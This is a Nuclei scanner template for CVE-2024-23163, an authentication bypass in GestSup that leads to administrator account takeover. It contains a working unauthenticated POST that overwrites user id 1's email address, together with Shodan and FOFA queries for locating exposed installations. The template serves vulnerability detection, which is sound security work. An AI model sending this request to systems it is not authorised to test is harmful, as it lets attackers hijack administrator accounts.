nuclei-templates/http/cves/2024/CVE-2024-23163.yaml

63 lines
2.1 KiB
YAML

id: CVE-2024-23163
info:
name: GestSup - Account Takeover
author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
severity: critical
impact: |
An attacker could bypass the authentication process and access the application as an administrator user by modifying the usermail field to a controlled email address and requesting a password reset.
remediation: Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place.
reference:
- https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163
- https://doc.gestsup.fr/install/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-23163
cwe-id: CWE-287
cpe: cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: gestsup
fofa-query: title="GestSup"
shodan-query: http.favicon.hash:-283003760
product: gestsup
tags: cve,cve2024,account-takeover,gestsup
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
http:
- raw:
- |
POST /ajax/ticket_user_db.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: xmlhttprequest
Content-Type: application/x-www-form-urlencoded
modifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"status":"success'
- 'firstname":"{{firstname}}","lastname":"{{lastname}}'
condition: and
- type: word
part: header
words:
- 'text/html'
extractors:
- type: dsl
dsl:
- '"Firstname: "+ firstname'
- '"Lastname: "+ lastname'
# digest: 4b0a00483046022100a036a0a3be0d015b52596f4b64a23dc34b9ece1dc1e04d728142f8191fb59cec022100cf440488bb09fb80be9de4111f454da952c7f3fcec77735dde9aa0af620adf1f:922c64590222798bb761d5b6d8e72950